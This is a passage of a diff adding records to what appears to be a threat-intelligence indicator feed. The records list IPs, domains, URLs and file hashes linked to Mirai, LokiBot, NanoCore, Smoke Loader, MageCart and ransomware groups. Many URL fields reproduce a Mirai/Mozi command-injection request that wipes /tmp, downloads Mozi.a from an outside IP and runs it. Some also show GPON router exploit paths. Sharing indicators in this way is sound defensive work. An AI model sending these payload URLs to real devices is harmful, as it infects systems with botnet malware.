"7794f0640baa9635dde84acf72613315d9f21f1c", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "url": "http://194.143.143.92/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17271742070159, + "ip": [ + "194.143.143.92" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "a951e58828a652f58b1d83a35ece116bc4f5384b", + "type": "network", + "dateFirstSeen": 
"2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17271742150260, + "ip": [ + "120.85.143.32" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "6c476c94411019c92ae577ff29640059a99570b3", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "domain": "services.netserv.it", + "url": "https://services.netserv.it/shell?cd+/tmp;rm+-rf+*;wget+http://117.194.222.127:48116/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17271742310403, + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "4c58e7e792677c12e085584858456a916aeadf26", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "url": "http://91.241.86.173/shell?cd+/tmp;rm+-rf+*;wget+http:/117.194.222.127:48116/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17271742310403, + "ip": [ + "91.241.86.173" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "9552634c5736847a120fdba581ecd064dcd7f48a", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17271742390481, + "ip": [ + "117.194.222.127" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "28b31e5eb264ee7aca043e3208205339600df6bc", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-10-20T00:00:00+03:00", + "domain": "www.saecoprofessional-online.com", + "url": "https://www.saecoprofessional-online.com/?images/", + "seqUpdate": 17271742862997, + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "5f07dc76ad5da9d1af1a1e4966570d2388d9c80d", + "type": "network", + "dateFirstSeen": 
"2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17271744058998, + "ip": [ + "175.145.104.233" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "84e2c6024683d2630d487fca2ff812b8e898518f", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-10-03T00:00:00+03:00", + "domain": "in.originaljapan.com", + "url": "https://in.originaljapan.com/Infinity/GponForm/diag_Form?images/", + "seqUpdate": 17271876590688, + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "0e91008ddae323fc0dca97c1670665489c1d2f49", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-10-23T00:00:00+03:00", + "seqUpdate": 17271915368314, + "ip": [ + "192.172.232.47" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "3d226ba2b5733008ff8c480406440c1af62e59c1", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17271924169523, + "ip": [ + "64.7.198.58" + ], + "malwareList": null, + "threatList": [ + { + "name": "Gamaredon", + "title": "Gamaredon - New indicators have been found" + } + ] + }, + { + "id": "cde02b93d6ebc2d797b17bc1995c8723eff495e5", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17271948103538, + "ip": [ + "123.185.228.120" + ], + "malwareList": null, + "threatList": [ + { + "name": "Maze", + "title": "Maze - New indicators have been found" + } + ] + }, + { + "id": "f5888d4f085228afaaba8501d3305613d1d3bfcb", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17271978144377, + "ip": [ + "18.140.249.150" + ], + "malwareList": null, + "threatList": [ + { + "name": 
"PYSA", + "title": "PYSA - New indicators have been found" + } + ] + }, + { + "id": "26a07525de5f8a75d5125bbd6aaa505e89aac628", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17271978163913, + "ip": [ + "35.183.5.23" + ], + "malwareList": null, + "threatList": [ + { + "name": "PYSA", + "title": "PYSA - New indicators have been found" + } + ] + }, + { + "id": "b1eff6728f2d3df960af15671817f4cea22d1137", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17271978164559, + "ip": [ + "18.183.74.18" + ], + "malwareList": null, + "threatList": [ + { + "name": "PYSA", + "title": "PYSA - New indicators have been found" + } + ] + }, + { + "id": "a74a36bc0bb2c7a7e69243c98225013a73e72fd0", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17271984178226, + "ip": [ + "8.152.159.89" + ], + "malwareList": null, + "threatList": [ + { + "name": "Lockbit", + "title": "Lockbit - New indicators have been found" + } + ] + }, + { + "id": "2deeb3486f08db7b525215eb99956f7d4dc31390", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "url": "http://91.241.86.2/shell?cd+/tmp;rm+-rf+*;wget+http:/195.22.245.159:47052/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17271985728253, + "ip": [ + "91.241.86.2" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "911a35fbf9a8dd473326de1861da7cbb6df86bef", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-10-09T00:00:00+03:00", + "seqUpdate": 17271985808349, + "ip": [ + "195.22.245.159" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": 
"c6455b2f808f453962ca103bedbb2bd3248f797a", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17271996241948, + "ip": [ + "164.68.105.133" + ], + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "3add286b04f1c3a35cfe44f13f5c6ad95b2d919d", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17272002119844, + "ip": [ + "5.188.87.43" + ], + "malwareList": null, + "threatList": [ + { + "name": "Infra Storm", + "title": "Infra Storm - New indicators have been found" + } + ] + }, + { + "id": "261ebae6a1e797d6e85455e2594a7ef72b3c05e5", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "url": "http://194.143.143.234/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17272028931661, + "ip": [ + "194.143.143.234" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "9b6031f5675057516f3e6fe912de9ccdef8b903c", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17272029011751, + "ip": [ + "27.47.2.155" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "6e5f0e97e7d96edffe1fff5e4b54017c24320d16", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "url": "http://91.241.87.53/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17272132318667, + "ip": [ + "91.241.87.53" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "b9edf0c67ea82ff2d3f066b52fe21652b45da2ec", + "type": 
"network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17272132329141, + "ip": [ + "120.85.113.51" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "1588a4d340b710e566d33e0269b8944f17fee108", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "domain": "myhealthscap.us", + "seqUpdate": 17272147675605, + "malwareList": null, + "threatList": [ + { + "name": "Trung", + "title": "Trung - New indicators have been found" + } + ] + }, + { + "id": "93da2f2ac9a35a36bc98ffe890226766af0c0f04", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "domain": "areariservata.tsrm-pstrp-toaoalat.org", + "url": "https://areariservata.tsrm-pstrp-toaoalat.org/GponForm/diag_Form?images/", + "seqUpdate": 17272152489171, + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "712e84164c38c36a7bad197536a4476c4eebd225", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "url": "https://185.186.93.219:80/shell?cd+/tmp;rm+-rf+*;wget+http://81.235.157.102:48997/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17272218956578, + "ip": [ + "185.186.93.219" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "0e44ca1a7ec2fb8f37cb613245c4bc50d1615502", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "url": "http://185.186.93.219/shell?cd+/tmp;rm+-rf+*;wget+http:/81.235.157.102:48997/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17272218977148, + "ip": [ + "185.186.93.219" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": 
"4e6b0e5742da31b183ef8b6d98ef6e2fe1dd2c82", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17272219017784, + "ip": [ + "81.235.157.102" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "2681920a786dcf41f82e1a9df4a9f1885d487f3f", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-10-07T00:00:00+03:00", + "url": "http://192.172.232.151/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17272254209787, + "ip": [ + "192.172.232.151" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "b52d54ffc96727a8609835c7bb4532ec377b05a5", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272254280182, + "ip": [ + "120.86.252.132" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "0736e8b081a85bef828453ae0a1f86be3fffd44f", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "url": "http://195.88.234.18/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17272277221964, + "ip": [ + "195.88.234.18" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "9b22e63380d0760ef6d9ac7bcc54b58d323dbd75", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272277302054, + "ip": [ + "120.86.254.18" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "ca2bd107d22585412ede7cd29fe387aa0aa025c0", + "type": "network", + "dateFirstSeen": 
"2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-10-13T00:00:00+03:00", + "url": "http://194.143.143.184/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17272290148979, + "ip": [ + "194.143.143.184" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "a5dce542b57736dd0a4eaac636e0e75c8199b993", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272290229058, + "ip": [ + "120.86.253.47" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "7ad6fb99c256de0398e95a9827b5a69e0c79a75d", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "www.giua.edu.it", + "url": "https://www.giua.edu.it/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17272389422269, + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "b056da19e75296a3202169154c171f9efae7f955", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "url": "http://82.85.155.133/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17272389422270, + "ip": [ + "82.85.155.133" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "8d79ec10034224ce295b7a7413e912c59cf3875c", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272389502347, + "ip": [ + "120.86.252.150" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "356559715189a1680f4228b56257d4cbf76bdd3a", + "type": 
"network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-10-18T00:00:00+03:00", + "url": "https://185.186.93.133:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17272425640705, + "ip": [ + "185.186.93.133" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "81a1298b18f41c9db1cdfeb4dfb1a3876b259477", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-10-18T00:00:00+03:00", + "url": "http://185.186.93.133/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17272425720794, + "ip": [ + "185.186.93.133" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "2c45e6992af0f02da46779b31edd63aad28510d0", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272425800895, + "ip": [ + "120.86.254.1" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "ec0aa3c5a4c1dfdd04670fbd1c80a290b8d52b61", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "ban371.com", + "seqUpdate": 17272482149512, + "malwareList": null, + "threatList": [ + { + "name": "MageCart", + "title": "MageCart - New indicators have been found" + } + ] + }, + { + "id": "514cab3d8d33f909c5d09ef4616a4e5f88a15f85", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "gz-zhentong.com", + "seqUpdate": 17272482150157, + "malwareList": null, + "threatList": [ + { + "name": "MageCart", + "title": "MageCart - New indicators have been found" + } + ] + }, + { + "id": "355ec732a3429e3574e4235d486111447ffe2d18", + "type": "network", + 
"dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "hnjtsy.com", + "seqUpdate": 17272482151002, + "malwareList": null, + "threatList": [ + { + "name": "MageCart", + "title": "MageCart - New indicators have been found" + } + ] + }, + { + "id": "54124f4a62f2d0ff8eca7003b6d3ee7a8dcc5ff8", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "029jcyy.com", + "seqUpdate": 17272482151675, + "malwareList": null, + "threatList": [ + { + "name": "MageCart", + "title": "MageCart - New indicators have been found" + } + ] + }, + { + "id": "a23d9de339f4639c8abb2632904ebc5bf7d72612", + "type": "file", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "seqUpdate": 17272563680736, + "hash": [ + "67abb96be4be1e0e832c0d9c431c9bb7", + "7b5b3977fe1915503a91fce0c1ac03cbad8b671a", + "5aa81b94f9f9cae6d6b2d40836b1a2e7f3330c81e229631b6d8e3a0367e4c73a" + ], + "malwareList": [ + { + "name": "Loki PWS", + "aliases": [ + "Loki Bot", + "Primarypass", + "LokiBot" + ] + } + ], + "threatList": null + }, + { + "id": "ee654d9f89a21623237914d68afb016a7eb438d7", + "type": "file", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "seqUpdate": 17272563681147, + "hash": [ + "63ee4894adb2cb12591d06a43291f724", + "f61321202e3b175fe1f553984b1de3fe0ea9bba9", + "9dc109035bc4cf133bbd4ef89b110075e54d4a0920031577dc48e6c9dc41258b" + ], + "malwareList": [ + { + "name": "Loki PWS", + "aliases": [ + "Loki Bot", + "Primarypass", + "LokiBot" + ] + } + ], + "threatList": null + }, + { + "id": "f1087375afdade77a35452000351f3f15b065c53", + "type": "file", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "seqUpdate": 17272563681419, + "hash": [ + "a2b6f0dea4a17d6965ba9f07f7f088f8", + "027cca9ce25baed655452dd86a5be6cae5f1bdb5", + 
"ebd44e063ab8a49d0e3c2977fee41283478f9d9ad3c0d2e67d9339bd3c111ba9" + ], + "malwareList": [ + { + "name": "Loki PWS", + "aliases": [ + "Loki Bot", + "Primarypass", + "LokiBot" + ] + } + ], + "threatList": null + }, + { + "id": "59a835c5918b8abfc73ee41c1f08c7f7074f74fd", + "type": "file", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "seqUpdate": 17272565922179, + "hash": [ + "e7bf5eebf8f9ea61a08d7cd16998331c", + "b4cd8c7f444362beb1c745ba1652c0dc77dd4076", + "5e639d8ba3872cf73add9786a73bb2e921229e6203f0860f1953fa7a696096aa" + ], + "malwareList": [ + { + "name": "", + "aliases": null + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "4f0736a7ea1fc526cf4a61aa032507c65e78207c", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272565922386, + "hash": [ + "b8821b7c85e65be84bba8312866db434", + "88e248bb30bdad6468135f2735983d5193bb2873", + "038d9be8465938d21365b05c92c3b576c9363c79eae1bdc2af9cbe9b7839804c" + ], + "malwareList": [ + { + "name": "", + "aliases": null + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "a80e06c258b6191da5e6f2938370816b1cdc10bc", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272565922612, + "hash": [ + "3ea06838fe2c1022fa0b44a68d532184", + "c7e623bf32ca7ca9df59369aae25bce4fb6f9dad", + "f29c488f154678650a4a1eeb6d6ea22373dee25ce391c32dd319a1802ecb6f37" + ], + "malwareList": [ + { + "name": "", + "aliases": null + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "5b818ff013e5c99a1921cb5d024c2ce868e074cb", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272565922817, + "hash": [ + "cd4e6ebe5ae80e5666724948193ab1dc", + 
"36945ce54c7eb2aa605e62813d6602336280938e", + "0c8cf7cf9432bce6f0f873a5a6bc49b38408d2d39f13baa0ae3ded2df9789b44" + ], + "malwareList": [ + { + "name": "", + "aliases": null + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "23ee524516ebd835f91e811a3900c80fc140470b", + "type": "file", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "seqUpdate": 17272566601090, + "hash": [ + "da0bf0c618afdcec9df34d437794e4c0", + "f85223bf5b04d6eceb04baeee97825b060337dd5", + "e25240231baa27e14f83428e060074197a63affbcf6f1c7990aa4a3115d4b7fd" + ], + "malwareList": [ + { + "name": "NanoCore", + "aliases": [ + "Nancrat" + ] + } + ], + "threatList": null + }, + { + "id": "359222efe128ddbdb38b099155bc8823d73aa86d", + "type": "file", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "seqUpdate": 17272598705635, + "hash": [ + "59ed26b2b0871b6e44354b7be8b37841", + "57a408067bf05a900a10e6ca5e324752578ed4c0", + "29b1e38bdbf3911d09fd1ba9497763bf43cae1ac362ed12752ec03c13902c71a" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "dcd952c2e47a80584deed5084ed8a9e3249e4bf4", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "gateway.luccacrea.it", + "url": "https://gateway.luccacrea.it?cd+/tmp;rm+-rf+*;wget+http://14.153.215.21:60552/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17272624329832, + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "abeccb6083819c9a318f2853cc68ff20d5cd5ea4", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "url": "http://185.186.95.30/shell?cd+/tmp;rm+-rf+*;wget+http:/14.153.215.21:60552/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17272624329832, + "ip": [ + 
"185.186.95.30" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "0aac6c1c77d630dd2f678e0135b84b767c55422e", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272624329935, + "ip": [ + "14.153.215.21" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "a61da31617d6936c55c400deee223804fc0565a4", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-10-09T00:00:00+03:00", + "url": "http://91.241.86.16/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17272626751479, + "ip": [ + "91.241.86.16" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "3c2a8b2d6d4506efb78d2b7598c9c4c5d1934c9c", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272626751559, + "ip": [ + "120.85.117.170" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "080b26b2c5622d7540d395cfae98e156b2aa9da7", + "type": "file", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "seqUpdate": 17272628055169, + "hash": [ + "839557b603813c7f69a746038f0a811c", + "0e5591c5177e7cdd71fa9eece62d9c84f3012210", + "bb88299d84c5d91fe877681b606f2fa1cc52be53b7dad9a5da07d97a45e5a28b" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "ba1e7f6c3094798ba4f06a13e682a701b5db1621", + "type": "file", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "seqUpdate": 17272628102517, + "hash": [ + 
"0e2db7174e5c3204e0bf0dc9c9d1e851", + "2e16040a6d7f0f7680ae1a3af18966db0ff52ec8", + "ac52fa38ae392565d490fe43680342f43633697581f6b703ef27796c275ac12a" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "9aa7a765e1e21e961a62de4d0ebc19b063c009a8", + "type": "file", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "seqUpdate": 17272628102754, + "hash": [ + "34e07317817ca03f5eb4566851fe0cf3", + "53aa6a1e3ca6e956c33f2b217649977aa1bb7ac3", + "03d00112c73404cd29f4eb191574376b580a1c1cf38560d07e988ccea2006e3e" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "dd73c83c2f80a8c28f87be71556a5ed5cb9dd3cc", + "type": "file", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "seqUpdate": 17272628103000, + "hash": [ + "e7737c0050348741b60eeb5f98d96e16", + "66cbb84c65984c1ae1ff3f7617de65dd59e9eee4", + "b76e4bcba8728ee64e7982fdafff2960385ac8d5bc3ead203116e78d3914a62e" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "e4ab0c1d4ab049785c52c1ffaf592d835591c4e9", + "type": "file", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "seqUpdate": 17272628103261, + "hash": [ + "70fb2a6dd3c20b91ae1a355ab5275294", + "3d90326a777d3a92f9403a5355c43e741cf2f1ea", + "89b8b6d6191ea06cf92ba5cfb80b1d75af6a12c56f91fc493712c2a106e06dfd" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + 
